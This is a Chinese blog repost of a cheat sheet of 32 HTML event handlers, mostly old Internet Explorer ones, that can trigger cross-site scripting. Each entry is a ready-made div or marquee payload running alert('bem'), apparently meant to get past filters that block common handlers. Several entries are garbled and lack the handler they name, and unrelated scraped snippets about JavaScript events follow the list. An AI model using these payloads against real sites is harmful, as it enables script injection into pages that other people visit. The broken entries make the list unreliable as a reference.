32个触发事件XSS语句的总结

http://hi.baidu.com/cr3xdker/blog/item/02f94520c1e39c56ad34dee6.html
1、onmouseenter:当鼠标进入选区执行代码
<div style="123456</div>

2、onmouseleave:当鼠标离开选区执行代码
<DIV onmouseleave="alert(‘bem‘)" style="123456</DIV>

3、onmousewheel:当鼠标在选区滚轮时执行代码
<DIV onmousewheel="alert(‘bem‘)" style="123456</DIV>

4、onscroll:拖动滚动条执行代码
<div style="width:100px;height:100px;overflow:scroll" onscroll="alert(‘bem‘)">123456
<br/>
<br/>
<br/>
<br/>
<br/>
</div>

5、onfocusin:当获得焦点时执行代码
<div contentEditable="true" style="asdf</div>

6、onfocusout:当失去焦点时执行代码
<div contentEditable="true" style="asdf</div>

7、onstart:当显示内容时执行代码
<marquee style="background-color:red" onstart="alert(‘bem‘)" >asdf</marquee>

8、onbeforecopy:选中内容后右键执行代码
<div style="" onbeforecopy="alert(‘bem‘)" >asdf</div>

9、onbeforecut:选中内容后右键执行代码
<div style="" onbeforecut="alert(‘bem‘)" >asdf</div>

10、onbeforeeditfocus:当获得焦点时执行代码
<div style="" contentEditable="true" onbeforeeditfocus="alert(‘bem‘)" >asdf</div>

11、onbeforepaste:选中内容后右键执行代码
<div style="" ="true" onbeforepaste="alert(‘bem‘)" >asdf</div>

12、oncontextmenu:鼠标右键执行代码
<div style="" oncontextmenu="alert(‘bem‘)" >asdf</div>

13、oncopy:鼠标右键执行复制时执行代码
<div style="" oncopy="alert(‘bem‘)" >asdf</div>

14、oncut:鼠标右键执行剪切时执行代码
<div contentEditable="true" style="" oncut="alert(‘bem‘)" >asdf</div>

15、ondrag:选择内容并拖动时执行代码
<div style="" ondrag="alert(‘bem‘)" >asdf</div>

16、ondragend:选择内容并拖动松开鼠标执行代码
<div style="" ondragend="alert(‘bem‘)" >asdf</div>

17、ondragenter:选择内容并拖动时执行代码
<div style="" ondragenter="alert(‘bem‘)" >asdf</div>

18、ondragleave:选择内容并拖出边框执行代码
<div contentEditable="true" style="" ondragleave="alert(‘bem‘)" >asdf</div>

19、ondragover:选择内容并拖动时执行代码
<div contentEditable="true" style="" ondragover="alert(‘bem‘)" >asdf</div>

20、ondragstart:选择内容并拖动时执行代码
<div contentEditable="true" style="" ondragstart="alert(‘bem‘)" >asdf</div>

21、ondrop:有内容被拖动进来时执行代码
<div contentEditable="true" style="" ondrop="alert(‘bem‘)" >asdf</div>
<div contentEditable="true" style="" ondrop="alert(‘bem‘)" >asdf</div>

22、onlosecapture:选择内容时执行代码
<div contentEditable="true" style="" onlosecapture="alert(‘bem‘)" >asdf</div>

23、onpaste:粘贴时执行代码
<div contentEditable="true" style="" onpaste="alert(‘bem‘)" >asdf</div>

24、onselectstart:选择内容时执行代码
<div contentEditable="true" style="" onselectstart="alert(‘bem‘)" >asdf</div>

25、onhelp:进入焦点按F1时执行代码
<div contentEditable="true" style="" onhelp="alert(‘bem‘)" >asdf</div>

26、onEnd:当时间线执行完毕时执行代码
<div STYLE="behavior:url(‘#default#time2‘)" onEnd="alert(‘bem‘)">asdf</div>

27、onBegin:当时间线开始执行代码
<div STYLE="behavior:url(‘#default#time2‘)" onBegin="alert(‘bem‘)">asdf</div>

28、onactivate:激活当前标签时执行代码
<div contentEditable="true" STYLE="" onactivate="alert(‘bem‘)">asdf</div>

29、onfilterchange:当滤镜改变时执行代码
<div contentEditable="true" STYLE="filter: Alpha(opacity=100, style=2);" onfilterchange="alert(‘bem‘)">asdf</div>

30、onbeforeactivate:当激活当前标签时执行代码
<div contentEditable="true" STYLE="" onbeforeactivate="alert(‘bem‘)">asdf</div>

31、onbeforedeactivate:当标签内值改变时执行代码
<div contentEditable="true" STYLE="" onbeforedeactivate="alert(‘bem‘)">asdf</div>

32、ondeactivate:当标签内值改变时执行代码
<div contentEditable="true" STYLE="" ondeactivate="alert(‘bem‘)">asdf</div>

时间: 2025-01-08 19:23:51

32个触发事件XSS语句的总结的相关文章

IE10、Chrome获取触发事件节点的源对象

记录学习JavaScript中遇到的知识点 1.IE中获取触发事件节点的源对象是通过属性srcElement,而Chrome则是以属性tagName获得.以如下函数getEventTarget(e)实现源对象的获取. 1 <script tyoe="text/JavaScript"> 2 //获取触发事件节点的源对象 3 function getEventTarget(e){ 4 e=window.event || e; 5 return e.srcElement || e

NetworkComms网络程序开发笔记(一): 在多线程环境中安全的触发事件

在多线程中触发事件可能抛出引用为空的异常,这个问题网上有很多论述. NetworkComms通信框架本身几乎没有使用事件,所以在核心通信框架中不存在这个问题. 在网上查了很多资料,比如下面这个: 我们采用的方案: public static class Extensions { public static void Raise<T>(this EventHandler<T> handler, object sender, T args) where T : EventArgs {

input _文本框回车或者失去光标触发事件

IE下,当一个HTML元素的属性改变的时候,都能通过 onpropertychange来即时捕获. onchange在属性值改变时还必须使得当前元素失去焦点(onblur)才可以激活该事件. 了解这一点后我们发现onpropertychange的效果就是我们想要的,可是很遗憾,它只在IE下有效果.我们能不能找到另外一个时间来代替onpropertychange呢? 经过翻阅资料得知,在其他浏览器下可以使用oninput事件来达到同样的效果,真是太好了,我们只需要把IE浏览器区分出来就可以. 如果

深入A标签点击触发事件而不跳转的详解

本文介绍下,当点击A标签时,触发事件但不跳转的实现方法,有需要的朋友参考下吧. 点击页面上的空链接,点击后页面自动刷新,并会定位到页面顶端. 不过,有时需要点击#页面但不作跳转,可以这样写: <a href="#2">脚本学堂---网站编程</a> 在#后加上点别的东西即可,这样就不会链到别的页面,也不会刷新定位到顶端了. 附,A标签点击触发事件但不跳转的实现方法. 在a标签中有点击事件:1. a href="javascript:js_method(

JAVA实现延时过期MAP 支持自定义过期触发事件

如题,直接上代码: 1 import java.util.Iterator; 2 import java.util.concurrent.ConcurrentHashMap; 3 import java.util.concurrent.TimeUnit; 4 5 import org.slf4j.Logger; 6 import org.slf4j.LoggerFactory; 7 8 /** 9 * 实现延时过期MAP集合 支持自定义过期触发事件 10 * 11 * @ClassName: B

jQuery 自动触发事件的坑

有时候项目需求页面加载完后,需要模拟用户操作,自动点击按钮.Jquery中可以使用trigger()方法模拟事件. $(selector).trigger(event,[param1,param2,...]) event:必须,规定指定元素上要触发的事件.可以是自定义事件和标准事件. param1,param2,...可选.传递到事件处理程序的额外参数. 额外的参数对自定义事件特别有用. 例如,模拟点击事件可以用以下的语句 $('#btn').trigger("click"); $('

原生js自动触发事件

熟悉jquery的童鞋都知道在jq中有一个方法可以自动触发事件,那就是trigger(),那么通过原生js又怎么模拟触发呢? js中添加一个主动触发事件的方法有dispatch.该方法能模拟用户行为,如点击(click)操作等. 标准使用dispatchEvent方法,IE6/7/8则使用fireEvent方法. dispatchEvent() 方法给节点分派一个合成事件. 语法如下: dispatchEvent(eventObj) eventObj 参数是一个描述事件的 ActionScrip

JQuery 自动触发事件

常用模拟 有时候,需要通过模拟用户操作,来达到单击的效果.例如在用户进入页面后,就触发click事件,而不需要用户去主动单击. 在JQuery中,可以使用trigger()方法完成模拟操作.例如可以使用下面的代码来触发id为btn的按钮的click事件. 1 $('#btn').trigger("click"); 这样,当页面加载完毕后,就会立刻输出想要的效果.也可以直接简写click(),来达到同样的效果: 1 $('#btn').click(); 触发自定义事件 trigger()

window.event.srcElement与window.event.target 触发事件的元素

IE浏览器支持window.event.srcElement , 而firefox支持window.event.target:<input type="text" onblur="alert(this.value)">//正确滴 ****************** <input type="text" onblur="method()">//错的啦<script>function meth